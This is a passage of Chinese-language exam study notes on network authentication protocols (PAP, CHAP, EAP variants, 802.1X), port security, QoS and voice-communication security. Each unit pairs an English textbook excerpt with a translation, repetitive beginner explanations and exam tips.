先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
身份 身份是主体在系统中的标识。
学习单元 03 / PDF P840

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Password Authentication Protocol (PAP) PAP transmits usernames and passwords in cleartext. It offers no form of encryption; it simply provides a means to transport the logon credentials from the client to the authentication server. Challenge Handshake Authentication Protocol (CHAP) CHAP performs authentication using a challenge-response dialogue that cannot be replayed. A challenge is a random number issued by the server, which the client uses along with the password hash to compute the one-way functionderived response. CHAP also periodically reauthenticates the remote system throughout an established communication session to verify the persistent identity of the remote client.

This activity is transparent to the user. However, since CHAP is based on MD5, it is no longer considered secure. A Microsoft customization named MS-CHAPv2 uses updated algorithms, adds optional session encryption, and is preferred over the original CHAP. Extensible Authentication Protocol (EAP) This is a framework for authentication instead of an actual protocol. EAP allows customized authentication security solutions, such as supporting smartcards, tokens, and biometrics. EAP was originally designed for use over physically isolated channels and thus assumed secured pathways. Some EAP methods use encryption, but others do not.

Over 40 EAP methods are defined, including LEAP, PEAP, EAP-SIM, EAP-FAST, EAP-MD5, EAP-POTP, EAP-TLS, and EAPTTLS. Password Authentication Protocol (PAP) PAP

中文直译 / 整理

以明文传输用户名和密码。 它不提供任何形式的加密; 仅提供一种将登录凭据从客户端传输到认证服务器 的手段。 挑战握手认证协议 (CHAP) CHAP 使用无法重放的挑战‑响应对话进行身份验证。 挑战是由服务器发出的随机数,客户端使用该随机数和密码哈希值计算单向函数 派生的响应。 CHAP 还在已建立的通信会话期间定期重新验证远程系统,以确认 远程客户端的持续身份。 此活动对用户透明。 然而,由于 CHAP 基于 MD5,已 不再被视为安全。 一种名为 MS‑CHAPv2 的 Microsoft 自定义版本使用了更新 的算法,增加了可选的会话加密,并优于原始的 CHAP。 可扩展认证协议(EAP) 这是一种认证框架,而非实际的协议。 EAP 允许定制 化的认证安全解决方案,例如支持智能卡、令牌和生物识别技术。 EAP 最初是 为在物理隔离的通道上使用而设计的,因此假设了安全的传输路径。 一些 EAP 方法使用加密,但其他方法则不使用。 已定义了 40 多种 EAP 方法,包括 LEAP、PEAP、EAP‑SIM、EAP‑FAST、EAP‑MD5、EAP‑POTP、 EAP‑TLS 和 EAP‑TTLS。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 04 / PDF P841

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

EAP Derivatives Lightweight Extensible Authentication Protocol (LEAP) is a Cisco proprietary alternative to TKIP for WPA. It was developed to address deficiencies in TKIP before 802.11i/WPA2 was ratified as a standard. LEAP is now a legacy solution to be avoided. Protected Extensible Authentication Protocol (PEAP) encapsulates EAP in a TLS tunnel. PEAP is preferred to EAP because PEAP imposes its own security. PEAP supports mutual authentication. Subscriber Identity Module (EAP-SIM) is a means of authenticating mobile devices over the Global System for Mobile Communications (GSM) network.

Each device/subscriber is issued a subscriber identity module (SIM) card, which is associated with the subscriber's account and service level. Flexible Authentication via Secure Tunneling (EAP-FAST) is a Cisco protocol proposed to replace LEAP, which is now obsolete, thanks to the development of WPA2. EAP-MD5 was one of the earliest EAP methods. It hashes passwords using MD5. It is now deprecated. EAP Protected One-Time Password (EAP-POTP) supports the use of OTP tokens (which includes hardware devices and software solutions) in multifactor authentication for use in both one-way and mutual authentication.

EAP Transport Layer Security (EAP-TLS) is an open IETF standard that implements the TLS protocol for use in protecting authentication traffic. EAP-TLS is most effective when both client and server have a digital certificate (i.e., mutual certificate authentication). EAP Tunneled Transport Layer Security (EAP-TTLS) is an extension of EAP-TLS that creates a VPN-like tunnel between endpoints prior to authentication. This ensures that even the client's username is never transmitted in cleartext. EAP Internet Key Exchange v. 2 (EAP-IKEv2) is based on the IKEv2 (Internet Key Exchange) protocol from IPSec.

It provides mutual authentication, session key establishment, and supports authentication using passwords, symmetric keys, or asymmetric key pairs. EAP

中文直译 / 整理

衍生协议 轻量级可扩展认证协议(LEAP) 是 Cisco 专有的 TKIP 替代方案, 用于 WPA。 它被开发出来是为了在 802.11i/WPA2 被批准为标准之 前解决 TKIP 的缺陷。 LEAP 现在是一种应避免使用的遗留解决方案。 受保护的可扩展认证协议(PEAP) 将 EAP 封装在 TLS 隧道中。 PEAP 比 EAP 更受青睐,因为 PEAP 自身提供了安全性。 PEAP 支持双向认证。 用户身份模块(EAP-SIM) 是一种通过全球移动通信系统 (GSM) 网络对移 动设备进行认证的方法。 每个设备/用户都会分配一张用户身份模块 ( SIM) 卡,该卡与用户的账户和服务级别相关联。 通过安全隧道进行灵活认证(EAP-FAST) 是 Cisco 提出的一种协议,旨在 取代因 WPA2 的发展而已过时的 LEAP。 EAP-MD5 是最早的 EAP 方法之一。 它使用 MD5 对密码进行哈希处理。 目前该方法已被弃用。 EAP一次性密码保护(EAP-POTP) 支持在单向和双向认证中使用一次性密 码令牌(包括硬件设备和软件解决方案)进行多因素认证。

EAP传输层安全(EAP-TLS) 是一种开放的IETF标准,用于在保护认证 流量时实现TLS协议。 当客户端和服务器均拥有数字证书(即双向证书认 证)时,EAP‑TLS最为有效。 EAP隧道传输层安全(EAP-TTLS) 是EAP‑TLS的扩展,它在认证前在 端点之间创建类似VPN的隧道。 这确保了客户端的用户名永远不会以明 文形式传输。 EAP Internet Key Exchange v. 2 (EAP-IKEv2) 基于 IPSec 的 IKEv2 (Internet Key Exchange)协议。 它提供双向身份验证、会话密钥建 立,并支持使用密码、对称密钥或非对称密钥对进行身份验证。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

标准:标准给出必须满足的最低要求。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 05 / PDF P842

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

Nimble out-of-band authentication for EAP (EAP-NOOB) is a versatile bootstrapping solution for devices lacking preconfigured authentication credentials and those not yet registered on any server. It uses various OOB channels, such as QR codes, NFC tags, and audio. It is particularly useful for Internet-of-Things (IoT) gadgets and toys that arrive without any details regarding ownership, network affiliation, or server registration. For a more extensive list of EAP methods, see http://en.wikipedia.org/wiki/Extensible_Authentication_Protocol. IEEE 802.1X defines the use of encapsulated EAP to support a wide range of authentication options for LAN connections.

The IEEE 802.1X standard is formally named “Port-Based Network Access Control,” where port refers to any network link, not just physical RJ-45 jacks. This technology ensures that clients can't communicate with a resource until proper authentication has taken place. It's based on Extensible Authentication Protocol (EAP) from PPP. Many people encounter 802.1X in relation to wireless networking, where it serves as the basis for wireless enterprise authentication.

In that implementation, 802.1X serves as an authentication proxy by forwarding wireless client authentication requests to a dedicated remote authentication server or AAA server (typically RADIUS or TACACS+; see Chapter 14, “Controlling and Monitoring Access”). Thus, it is important to remember that 802.1X isn't a wireless technology (i.e., IEEE 802.11)—it is an authentication technology that can be used anywhere authentication is needed, including WAPs, firewalls, routers, switches, proxies, VPN gateways, and remote access servers (RASs)/network access servers (NASs).

When 802.1X is in use, it makes a port-based decision about whether to allow or deny a connection based on the authentication of a user or service. Like many technologies, 802.1X may be vulnerable to adversary-in-themiddle (AiTM) (aka MiTM or on-path) and hijacking attacks because the authentication mechanism occurs only when the connection is established. Not all 802.1X or EAP authentication methods are secure; some only check for superficial IDs, such as a MAC address, before granting access. This issue can be addressed by using periodic mid-session reauthentication, as well as implementing session encryption in addition to any authentication protections provided by 802.1X/EAP.

Nimble out-of-band authentication for EAP (EAP-NOOB)

中文直译 / 整理

是一种适用于 缺乏预配置身份验证凭据以及尚未在任何服务器上注册的设备的多功能引 导解决方案。 它使用多种带外通道,例如二维码、NFC 标签和音频。 特 别适用于那些出厂时未提供任何所有者、网络归属或服务器注册信息的物 联网(IoT)设备和玩具。 有关 EAP 方法的更完整列表,请参阅 http://en.wikipedia.org/wiki/Extensible_Authentication_Protocol. IEEE 802.1X 定义了使用封装的 EAP 来支持 LAN 连接的多种认证选项。 IEEE 802.1X 标准正式命名为“基于端口的网络访问控制”,其中 端口 指的是 任何网络链路,而不仅仅是物理的 RJ‑45 接口。 该技术确保客户端在通过适当 认证之前无法与资源通信。 它基于 PPP 的可扩展认证协议(EAP)。 许多人是在无线网络的背景下遇到 802.1X 的,它作为无线企业认证的基础。 在该实现中,802.1X 通过将无线客户端认证请求转发至专用的远程认证服务 器或 AAA 服务器(通常是 RADIUS 或 TACACS+; 参见第 14 章,“控制和 监控访问”)来充当认证代理。

因此,重要的是要记住,802.1X 并不是一种无线技术(即 IEEE 802.11)—— 它是一种认证技术,可在任何需要认证的地方使用,包括 WAP、防火墙、路 由器、交换机、代理、VPN 网关以及远程访问服务器(RAS)/网络访问服务 器(NAS)。 当使用802.1X时,它会根据用户或服务的认证情况,做出基于端口的决策,以决定 是否允许或拒绝连接。 与许多技术一样,802.1X 可能容易受到中间人(AiTM)(也称为 MiTM 或 路径中)和劫持攻击,因为身份验证机制仅在连接建立时发生。 并非所有 802.1X 或 EAP 身份验证方法都是安全的; 有些仅在授予访问权限前检查表面 身份,例如 MAC 地址。 此问题可以通过使用会话中期的周期性重新身份验证, 以及在 802.1X/EAP 提供的任何身份验证保护之外实施会话加密来解决。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 06 / PDF P843

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

For a discussion of 802.1X, LEAP, and PEAP in relation to wireless networking, see Chapter 11, “Secure Network Architecture and Components.” Port Security Port security in IT can mean several things. It can mean the physical control of all connection points, such as RJ-45 wall jacks or device ports (such as those on a switch, router, or patch panel), so that no unauthorized users or devices can attempt to connect to an open port. This control can be accomplished by locking down the wiring closet and server vaults and then disconnecting the workstation run from the patch panel (or punch-down block) that leads to a room's wall jack.

Any unneeded or unused wall jacks can (and should) be physically disabled in this manner. Another option is to use a smart patch panel that can monitor the MAC address of any device connected to each wall port across a building and detect not just when a new device is connected to an empty port, but also when a valid device is disconnected or replaced by an invalid device. Another meaning for port security is the management of TCP and User Datagram Protocol (UDP) ports. If a service is active and assigned to a port, then that port is open. All the other 65,535 ports (TCP or UDP) are closed if a service isn't actively using them.

Threat actors can detect the presence of active services by performing a port scan. Firewalls, IDSs, IPSs, and other security tools can detect this activity and either block it or send back false/misleading information. This measure is a type of port security that makes port scanning less effective. Port security can also refer to the need to authenticate to a port before being allowed to communicate through or across the port. This may be implemented on a switch, router, smart patch panel, or even a wireless network. This concept is often referred to as IEEE 802.1X. For the full discussion of network access control (NAC), see Chapter 11.

Quality of Service (QoS) Quality of service (QoS) is the oversight and management of the efficiency and performance of network communications. QoS controls protect the availability of data networks under load. Many different factors contribute to the quality of the end-user experience, and QoS attempts to manage all of those factors to create an experience that meets business requirements.

中文直译 / 整理

有关 802.1X、LEAP 和 PEAP 与无线网络关系的讨论,请参阅 第 11 章,“安全 网络架构与组件。 ” 端口安全 端口安全在IT领域中可以指多种含义。 它可能意味着对所有连接点(例如 RJ‑45墙插口或设备端口(如交换机、路由器或配线架上的端口))进行物理 控制,以防止未经授权的用户或设备尝试连接到开放端口。 这种控制可以通过 锁定布线间和服务器机房,并断开通向房间墙插口的配线架(或打线块)上的 工作区线路来实现。 任何不需要或未使用的墙插口都可以(且应当)以这种方 式物理禁用。 另一种选择是使用智能配线架,它可以监控建筑物内每个墙插口 所连接设备的MAC地址,不仅能检测到新设备连接到空闲端口的情况,还能 检测到有效设备被断开或被无效设备替换的情况。 端口安全的另一种含义是管理TCP和用户数据报协议(UDP)端口。 如果某个 服务处于活动状态并分配给某个端口,则该端口即为开放状态。 如果未被任何 服务主动使用,则其余65,535个端口(TCP或UDP)均为关闭状态。 攻击者可 以通过端口扫描检测活动服务的存在。

防火墙、入侵检测系统(IDS)、入侵 防御系统(IPS)及其他安全工具可以检测此类活动,并阻止其行为或返回虚 假/误导性信息。 这种措施是一种端口安全手段,可降低端口扫描的有效性。 端口安全还可以指在允许通过或跨端口通信之前,必须对端口进行身份验证。 此功能可在交换机、路由器、智能配线架甚至无线网络上实现。 此概念通常被 称为 IEEE 802.1X。 有关网络访问控制(NAC)的完整讨论,请参阅第 11 章。 服务质量(QoS) 服务质量(QoS)是对网络通信效率和性能的监督与管理。 QoS控制在负载情 况下保护数据网络的可用性。 许多不同的因素会影响最终用户的体验质量, QoS试图管理所有这些因素,以创造符合业务需求的体验。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 07 / PDF P844

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Some of the performance metrics or factors contributing to QoS are as follows: Bandwidth The network capacity available to carry communications. Latency The time it takes a packet to travel from source to destination. Jitter The variation in latency between different packets. Packet Loss Some packets may be lost between source and destination, requiring retransmission. Interference Electrical noise, faulty equipment, and other factors may corrupt the contents of packets. Throughput The actual amount of data transmitted successfully over a network or communication channel within a given period.

It is a measure of the effective data transfer rate and represents the real-world performance of the network. Signal-to-Noise Ratio (SNR) A measure of the quality of a signal in a communication channel. It compares the strength of the desired signal to the level of background noise or interference present in the channel. The higher the SNR, the better the quality of the signal. Based on the recorded/detected metrics in these areas, network traffic can be adjusted, throttled, or reshaped to account for unwanted conditions. QoS systems often prioritize certain traffic types that have a low tolerance for interference and/or have high business requirements.

High-priority traffic or time-sensitive traffic (such as VoIP) can be prioritized, and other traffic can be held back as needed. Throttling or shaping can be implemented on a protocol or IP basis to set a maximum use or consumption limit. In some cases, using alternate transmission paths, time-shifting noncritical data transfers, or deploying more or higher-capacity connections may be necessary to maintain a desired QoS. Most network administrators don't automatically consider QoS an aspect of security. However, availability is one of the elements of the CIA Triad.

By monitoring and managing QoS, essential communications and their related business operations, processes, and tasks may have their availability sustained and protected. QoS may also include specific security requirements, such as requiring encryption for certain types of traffic.

中文直译 / 整理

影响QoS的部分性能指标或因素如下: 带宽 网络可用于传输通信的容量。 延迟 数据包从源端传输到目的端所需的时间。 抖动 不同数据包之间延迟的变化。 丢包 部分数据包可能在源端和目的端之间丢失, 需要重传。 干扰 电气噪声、设备故障及其他因素可能导致数据包内容损坏。 吞吐量 在给定时间内通过网络或通信信道成功传输的实际数据量。 它是有效数 据传输速率的度量,代表网络的实际性能。 信噪比(SNR) 衡量通信信道中信号质量的指标。 它比较所需信号的强度与信 道中背景噪声或干扰的水平。 SNR 越高,信号质量越好。 基于这些领域中记录/检测到的指标,网络流量可以被调整、限速或重塑,以应 对不良状况。 QoS 系统通常优先处理对干扰容忍度低和/或业务需求高的流量类 型。 高优先级流量或时间敏感型流量(如 VoIP)可以被优先处理,其他流量则 可根据需要被延迟。 限速或流量整形可以基于协议或 IP 实施,以设定最大使用 或消耗限制。 在某些情况下,为维持所需的 QoS,可能需要使用备用传输路径、 非关键数据传输的时间偏移,或部署更多或更高容量的连接。 大多数网络管理员不会自动将QoS视为安全的一个方面。

然而,可用性是CIA三 元组的要素之一。 通过监控和管理QoS,可以维持和保护关键通信及其相关的 业务操作、流程和任务的可用性。 QoS还可能包括特定的安全要求,例如要求 对某些类型的流量进行加密。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 08 / PDF P845

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Transparency is the characteristic of a service, security control, or access mechanism that ensures that it is unseen by users. The more transparent a security mechanism is, the less likely a user will be able to circumvent it or even be aware that it exists. With transparency, there is a lack of direct evidence that a feature, service, or restriction exists, and its impact on performance is minimal. Secure Voice Communications Telephony is the collection of methods by which telephone services are provided to an organization or the mechanisms by which an organization uses telephone services for either voice and/or data communications.

Telephony includes public switched telephone network (PSTN) (aka plain old telephone service, or POTS), private branch exchange (PBX), mobile/cellular services (see Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures”), and VoIP. Public Switched Telephone Network The vulnerability of voice communication is tangentially related to IT system security. However, most voice communication solutions have moved on to the network (i.e., technology convergence) by employing digital devices and VoIP; therefore, securing voice communications is an increasingly important issue.

When voice communications occur over the IT infrastructure, it is important to implement mechanisms to provide for authentication and integrity. Confidentiality should be maintained by employing an encryption service or protocol to protect voice communications while in transit. PBX and PSTN voice communications are vulnerable to interception, eavesdropping, tapping, and other exploitations. Often, physical security is required to maintain control over voice communications within the confines of your organization's physical locations. Security of voice communications outside your organization is typically the responsibility of the phone company from which you lease services.

If voice communication vulnerabilities are an important issue for sustaining your security policy, you should deploy an encrypted communication mechanism and use it exclusively.

中文直译 / 整理

透明性是指服务、安全控制或访问机制的一种特性,确保用户无法察觉 其存在。 安全机制越透明,用户越难以绕过它,甚至可能根本意识不到它的 存在。 在透明性下,没有直接证据表明某项功能、服务或限制存在,且其对 性能的影响最小。 安全语音通信 电话技术是指向组织提供电话服务的各种方法,或组织用于语音和/或数据通信 的电话服务机制。 电话技术包括公共交换电话网络(PSTN)(又称传统电话服 务,即POTS)、专用交换机(PBX)、移动/蜂窝服务(参见第9章,“安全漏 洞、威胁与对策”),以及VoIP。 公共交换电话网络 语音通信的安全性与IT系统安全间接相关。 然而,大多数语音通信解决方案已 转向网络(即技术融合),采用数字设备和VoIP; 因此,保障语音通信变得日 益重要。 当语音通信通过IT基础设施进行时,必须实施机制以确保身份验证和 完整性。 应通过采用加密服务或协议来保护传输中的语音通信,以维持其机密 性。 PBX 和 PSTN 语音通信容易受到拦截、窃听、窃录和其他攻击。 通常,需要物 理安全措施来确保在您组织物理范围内的语音通信受到控制。 组织外部的语音 通信安全通常由您租赁服务的电话公司负责。

如果语音通信漏洞对维持您的安 全策略至关重要,则应部署加密通信机制并 exclusively 使用它。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 09 / PDF P846

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

PSTN connections were the only or primary remote network links for many businesses until high-speed, cost-effective, and ubiquitous access methods were available. POTS/PSTN also waned in use for home-user Internet connectivity once broadband and wireless services became more widely available. However, PSTN connections are sometimes still used as a backup option for remote connections when broadband solutions fail. PSTN may still be the only option for rural Internet and remote connections. PSTN is also used as standard voice lines when VoIP or broadband solutions are unavailable, interrupted, or not cost-effective.

